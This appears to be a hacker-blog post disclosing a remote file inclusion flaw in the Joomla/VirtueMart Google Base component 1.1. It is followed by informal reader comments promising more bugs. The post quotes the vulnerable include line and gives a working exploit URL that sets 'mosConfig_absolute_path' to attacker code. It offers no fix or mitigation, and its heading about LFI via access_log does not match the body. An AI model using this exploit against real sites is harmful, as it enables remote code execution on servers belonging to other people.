LFI to RCE via access_log injection

Virtuemart Google Base Component 1.1 - RFI


[o] Virtuemart Google Base Component 1.1 Remote File Inclusion Vulnerability
Software : com_googlebase version 1.1
Vendor : http://www.joomlahacks.com/
Author : NoGe


[o] Vulnerable file
administrator/components/com_googlebase/admin.googlebase.php
include( $mosConfig_absolute_path.'/administrator/components/com_virtuemart/virtuemart.cfg.php' );


[o] Exploit
http://localhost/[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=[evilcode]


Comments

Anonymous said…
wa br liat di milw0rm, keep thiz coming boz,& promo terus :)
evilc0de said…
xixixixi.. thx for visiting bro.
more bug will come soon... :p
labatterie said…
Thx for visiting bro more bug will come soon...